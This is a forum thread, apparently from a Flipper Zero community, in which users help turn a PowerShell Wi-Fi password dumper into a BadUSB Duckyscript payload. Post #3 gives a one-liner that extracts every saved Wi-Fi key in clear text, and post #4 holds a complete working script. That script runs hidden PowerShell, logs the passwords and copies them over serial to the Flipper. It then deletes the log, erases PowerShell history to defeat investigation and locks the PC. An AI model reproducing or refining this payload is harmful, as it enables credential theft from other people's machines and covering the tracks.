Need help converting Powershell code to Duckyscript

BadUSB
#1

Hi all,

I’m re-using some Powershell scripts for my Badusb on the flipper. Problem is that many of these have advanced statements in them. Since i’m not good at writing code, I could use some help please!

How to convert this block to a one-liner:

$wlanKeys = netsh wlan show networks |ForEach-Object {
    if ($_ -match '^SSID \d+\s*:\s*(.*)$') {
        $ssidName = $Matches[1]
        netsh wlan show profile "name=`"${ssidName}`"" key=clear |ForEach-Object {
            if ($_ -match 'Key Content\s*:\s*(.*)$') {
                [pscustomobject]@{
                    Name = $ssidName
                    Key = $Matches[1]
                }
            }
        }
    }
}
1 Like
#2

I could do this manual, but as we have great work from @Zarcolio here in the forum.
Try this one: What do you use the bad usb for? - #8 by Zarcolio

Edit: Not exactly what you asked for, but will work as BadUSB.

1 Like
#3

Lets see what we have.

All goes into one variable $wlanKeys … Why? It would make sense, if you add an Write-Host $wlanKeys below. Else the variable will vanish when the session is closed.

netsh wlan show networks # Lets start with this one.

Go through all Objects with | ForEach-Object { } can be cut to | % { } … But you already could use |select-string here and avoid the if: |select-string ":.*[a-zA-Z0-0-_]+"

And cut the interesting part (Proile name)
|%{"$_".split(":")[1].trim()}

and or the last step the output or each profile:
|%{netsh wlan show profile name=$_ key=clear}

netsh wlan show profiles |select-string ":.*[a-zA-Z0-0-_]+" |%{"$_".split(":")[1].trim()} |%{netsh wlan show profile name=$_ key=clear}

My only windows system is at home, so I can’t test I this will work in real. But I think with the explanation someone can debug the rest.
For example the output part could be improved. I can’t without seeing the actual format.

1 Like
#4

Ah perfect! Here is my result:

1# The script will get the Wifi Details
2# Then it will store the details in C:\Users\MyName\Log.txt
3# Then send it to the Flipper in folder /ext/apps_data/WiFiKeys_$env:computername.txt
4$ Then delete the log.txt from the attacked machine
5# Then clear it’s traces and lock the PC
6# Credits to the entire internet, this code is a mix of a few scripts like I_am_Jakoby

GUI r

DELAY 200

STRING cmd

ENTER

DELAY 200

STRING powershell -NoP -NonI -W Hidden

ENTER

DELAY 500

STRING $SSID = (get-netconnectionProfile).Name;

STRING $PASSPHRASE = $(netsh wlan show profiles |select-string ":.*[a-zA-Z0-0-_]+" |%{"$_".split(":")[1].trim()} |%{netsh wlan show profile name=$_ key=clear});

STRING Start-Transcript -Path "$home\Log.txt";

STRING netsh.exe wlan show interface;

STRING write-output $PASSPHRASE;

STRING Stop-Transcript;

ENTER

DELAY 200

STRING CD $home

ENTER

STRING $d=(Get-Content Log.txt|Out-String);

STRING $BHID="HID\\VID_046D\&PID_C529";

STRING $SUSB="USB\\VID_0483\&PID_5740";

STRING $SPATH="/ext/apps_data/WiFiKeys_$env:computername.txt"

ENTER

DELAY 500

REM ## Perform 600 loops, to check if BadUSB is still active, wait 1 sec. If the Flipper is just disconnected, the loop will wait 4 sec.

STRING 1..600|%{Try{$p=New-Object System.IO.Ports.SerialPort("COM$(((Get-PNPDevice -PresentOnly -Class 'Ports' -InstanceID 'USB\VID_0483&PID_5740*') -split "COM")[1][0])",115200,'None',8,'one');$p.open();$p.Write("storage write $SPATH `r`n");$p.Write($d);$p.Write("$([char] 3)");$p.Close();break}Catch{Sleep 1}};

ENTER

DELAY 1000

STRING Remove-Item -Force -Path $home\Log.txt

ENTER

STRING exit

REM -------remove powershell history (this probably wont be enough to remove all traces of you, this is just to prevent inital investigations

STRING Remove-Item (Get-PSreadlineOption).HistorySavePath

ENTER

STRING exit

ENTER

REM ------lock the pc

GUI l
2 Likes
#5

I don’t think the $SSID will help if there are more than one stored WLAN.
I remember the 600 loops ‘hack’ from somewhere :wink:

1 Like
#6

Will release this Duckyscript Script.
Thanks

1 Like